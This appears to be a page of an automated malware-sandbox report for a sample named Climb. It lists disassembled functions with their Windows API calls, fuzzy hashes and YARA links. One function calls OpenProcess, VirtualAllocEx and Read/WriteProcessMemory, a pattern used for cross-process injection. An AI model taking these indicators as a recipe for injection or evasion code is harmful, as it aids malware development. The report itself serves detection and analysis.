Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f0b33ae46eb854703ec3eac95966ad70c1734ab8fcba5dd55f2f840e330a8fd0
Instruction ID: ac12e051f0e03c697166d25f01f533d9b23a75c3c97e0ea7dd4c3b97804b3c75
Opcode Fuzzy Hash: f0b33ae46eb854703ec3eac95966ad70c1734ab8fcba5dd55f2f840e330a8fd0
Instruction Fuzzy Hash: 5A216D71D0021CAADB219FE4CC84AFEBBB9EF05324F104256FB25AA181D7709985CF50

Function 00AE138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00AE13AE
GetForegroundWindow.USER32 ref: 00AE13C5
GetDC.USER32(00000000), ref: 00AE1401
GetPixel.GDI32(00000000,?,00000003), ref: 00AE140D
ReleaseDC.USER32(00000000,00000003), ref: 00AE1445

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: bce8e531a7e6cdea826c323e736108e011b1057c3f887a46420c4954c4d26263
Instruction ID: c5492e97ac9d399fd2f6e5636e961b9034d0e9a85e8976307fca10de5c8fdb18
Opcode Fuzzy Hash: bce8e531a7e6cdea826c323e736108e011b1057c3f887a46420c4954c4d26263
Instruction Fuzzy Hash: CB21A236600214AFD744EFA5CD84AAEBBF5EF48300B048439F84ADB761DB30AD01DB90

Function 00A9D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A9D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A9D169

Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A9D18F
_free.LIBCMT ref: 00A9D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A9D1B1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 68d002f1e6ba702d556d63a9f1776a9f1d4c55af625f2c81d373e947441bfa82
Instruction ID: afd4c01c7fb5decd27a5401bda88891baecf79bcda05c0bc041aca07921c3a6c
Opcode Fuzzy Hash: 68d002f1e6ba702d556d63a9f1776a9f1d4c55af625f2c81d373e947441bfa82
Instruction Fuzzy Hash: 560171777016157F2B2167A69C88D7F6AAEDEC2BA13240329B905DA244DA608D42D1B0

Function 00AC6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00AC608D
_memcmp.LIBVCRUNTIME ref: 00AC60AB
_memcmp.LIBVCRUNTIME ref: 00AC60BE
_memcmp.LIBVCRUNTIME ref: 00AC60D6
_memcmp.LIBVCRUNTIME ref: 00AC60EE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b3965993089371e1423f5f673c1d90a66fdcf4e8e3a2c9df2b1ee5dc304b3df1
Instruction ID: 5482c2899b6da832b233d650314b8bd00b4080c90a56f7f1f323c475792958e6
Opcode Fuzzy Hash: b3965993089371e1423f5f673c1d90a66fdcf4e8e3a2c9df2b1ee5dc304b3df1
Instruction Fuzzy Hash: 4301D8F1A103057BE714F7215D42FAB736DDE50398F02802DFD06AB281E761ED11C6A1

Function 00A9316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00A8F64E,00A8545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A93170
_free.LIBCMT ref: 00A931A5
_free.LIBCMT ref: 00A931CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A931D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A931E2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: eb87d23d46636716527b36d62bf3ba2277a8c243f6f6a11aafb8a5d65a28d9a3
Instruction ID: 4e3d5bff0d469277a2de3cdb925c75082c70be1d52154b2b60830a46a8e1dae7
Opcode Fuzzy Hash: eb87d23d46636716527b36d62bf3ba2277a8c243f6f6a11aafb8a5d65a28d9a3
Instruction Fuzzy Hash: E301F473744A003B9F226774AD85E2B26FDAFC53B57310624F925E21B1EF21CB028261

Function 00AC08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?,?,00AC0C4E), ref: 00AC091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?), ref: 00AC0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0960

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fc275c44a14f685be90123fcc63138483b0300d2a0687a5de38e820fa982442c
Instruction ID: 54363eb222f162b0077f9dc7161ff4d116cab53805b1b398b159fe2b63176c4f
Opcode Fuzzy Hash: fc275c44a14f685be90123fcc63138483b0300d2a0687a5de38e820fa982442c
Instruction Fuzzy Hash: FF018F76600204EFEB118FA9DC44FAA7ABEEB44792F150128F905E6211D771DD41DBA0

Function 00ACF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00ACF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00ACF2BC
Sleep.KERNEL32(00000000), ref: 00ACF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00ACF2CE
Sleep.KERNEL32 ref: 00ACF30A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 30802ca3d1f5023bae914aa2c30b90a9b0748d0b537d61e02b2b54c4e9a8ec3f
Instruction ID: 4bc95aab5d83efa645526f136f5b97f96109b30fdcb246c03aec8d04635ad5d4
Opcode Fuzzy Hash: 30802ca3d1f5023bae914aa2c30b90a9b0748d0b537d61e02b2b54c4e9a8ec3f
Instruction Fuzzy Hash: 63016975C01619EFCF00EFE4E849AEEBB7AFB08700F02056AE511B2290DB309554C7A5

Function 00AC1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: eaf8e45ed6496e7a9b87b399fc154578ee2f8dd5ca9d10e5f23cfbf9cf6abe79
Instruction ID: 2c16febe7a697099fa29dd109b4f24df28270918c8676149601094db88d66e0a
Opcode Fuzzy Hash: eaf8e45ed6496e7a9b87b399fc154578ee2f8dd5ca9d10e5f23cfbf9cf6abe79
Instruction Fuzzy Hash: F5018CB9601205BFDB128FE4DC48E6A3B6EEF8A3A4B210418F945D7260DA31DC41DA60

Function 00AC1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC194E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ad2a56bc61631b2dce0c79050afae3239da54cbbab817f49f30275ef8b985f97
Instruction ID: b8ef535b93143c9ac793513f930dcb8d2b878df8d50abd6a0c1ad77b0414c017
Opcode Fuzzy Hash: ad2a56bc61631b2dce0c79050afae3239da54cbbab817f49f30275ef8b985f97
Instruction Fuzzy Hash: ECF06D75200302ABDB224FE5DC4DF663BAEEF8A7A0F110524FA45D72A1CB70DC12CA60

Function 00AC1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AC1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC19AE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5b5542b793498ed018eb9579556bf3f7afd05206289d89525eaa90cb2cdbea9b
Instruction ID: 48b6b6b05775f7f25420ec27fd13b52b57c8be5020ec164b9873c195dcc49220
Opcode Fuzzy Hash: 5b5542b793498ed018eb9579556bf3f7afd05206289d89525eaa90cb2cdbea9b
Instruction Fuzzy Hash: 8DF06275200301ABD7228FE4EC99F663B6EEF897A0F110514FA45C7251CB70D812CA60

Function 00AD0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CCB
CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CD8
CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CE5
CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CF2
CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CFF
CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0D0C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 309f2995b9a1e2cbcdaa5ee693791e114ef75a2539584103c16234f42a974989
Instruction ID: 8776ec9edc87c5b4668f7a87b304a5ce1d6f1f224ff749abded7c550b60787b2
Opcode Fuzzy Hash: 309f2995b9a1e2cbcdaa5ee693791e114ef75a2539584103c16234f42a974989
Instruction Fuzzy Hash: E801DC71800B058FCB30AFA6D880916FAF9BF602157108A3FD19352A21C7B0A858DE80

Function 00AC65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AC65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AC65D6
MessageBeep.USER32(00000000), ref: 00AC65EE
KillTimer.USER32(?,0000040A), ref: 00AC660A
EndDialog.USER32(?,00000001), ref: 00AC6624

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: cc6f2d8b8686ff87f2ab31c62f55cd3d22b6a524d8d7683bdc3ef8dd11c65f21
Instruction ID: ab731832cac2ed8408ba0c62dc9c95b8258ca8466a3b67978c5dabbf92172d95
Opcode Fuzzy Hash: cc6f2d8b8686ff87f2ab31c62f55cd3d22b6a524d8d7683bdc3ef8dd11c65f21
Instruction Fuzzy Hash: 56018630500304ABEB259F90DE4EFA67B79FB04B05F01065DA187A10E1DBF4AA45CA51

Function 00A9DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9DAD2

Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60

_free.LIBCMT ref: 00A9DAE4
_free.LIBCMT ref: 00A9DAF6
_free.LIBCMT ref: 00A9DB08
_free.LIBCMT ref: 00A9DB1A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bbfc255d310254408d2285111b80534342c1af6eb98e938f91af3869dec424cd
Instruction ID: cce89290c11e7b7139379a26aa3a45e9e806e88597d47d4c149088c2b7f02969
Opcode Fuzzy Hash: bbfc255d310254408d2285111b80534342c1af6eb98e938f91af3869dec424cd
Instruction Fuzzy Hash: 42F01732745204BB8E34EB68EA86E1A77EDEE047647A50C09F009DB901CF30FCC08BA4

Function 00A92610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9262E

Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60

_free.LIBCMT ref: 00A92640
_free.LIBCMT ref: 00A92653
_free.LIBCMT ref: 00A92664
_free.LIBCMT ref: 00A92675

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b87148fc4f11ef4bd2416e8db8421cbcdce71ff80456a37284fbc980216e07a1
Instruction ID: ee9becc59464846ea3ce6e07fd7d94eb027f28708633ca9d49f88676919072a8
Opcode Fuzzy Hash: b87148fc4f11ef4bd2416e8db8421cbcdce71ff80456a37284fbc980216e07a1
Instruction Fuzzy Hash: B3F09EB1A41520AB8F22EF5CFD01A4D3BE8FB247553650A4AF414D7275CF350A12AFD5

Function 00A912B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00A91469
__freea.LIBCMT ref: 00A91487

Part of subcall function 00A918A7: _free.LIBCMT ref: 00A918BF

Strings

am/pm, xrefs: 00A914EA
a/p, xrefs: 00A9154E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 0ca80e3df5ad8d83bc582467d7f435d061619108e435c7c57e58c4338180e217
Instruction ID: b65c6898d73dc5e1858048d1c2b2caa719e321c3ef44fcc88d87299c2195fd8b
Opcode Fuzzy Hash: 0ca80e3df5ad8d83bc582467d7f435d061619108e435c7c57e58c4338180e217
Instruction Fuzzy Hash: 73D11275F00207DADF259FA8C955BBAB7F1FF45300F29415AEA06AB290D7358D81CBA0

Function 00AC3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC2B1D,?,?,00000034,00000800,?,00000034), ref: 00ACBDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AC30AD

Part of subcall function 00ACBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00ACBDBF

Part of subcall function 00ACBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00ACBD1C
Part of subcall function 00ACBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AC2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00ACBD2C
Part of subcall function 00ACBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AC2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00ACBD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC3167

Strings

@, xrefs: 00AC317F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 4518dc219cbf4f1943b755ba1b384e83ed9dca7b6fc07b97732a5a63a968ea95
Instruction ID: b9597250b521927bb05d7e83ec543a93ab7c3cf0341be0d72015b1a55ead7aa8
Opcode Fuzzy Hash: 4518dc219cbf4f1943b755ba1b384e83ed9dca7b6fc07b97732a5a63a968ea95
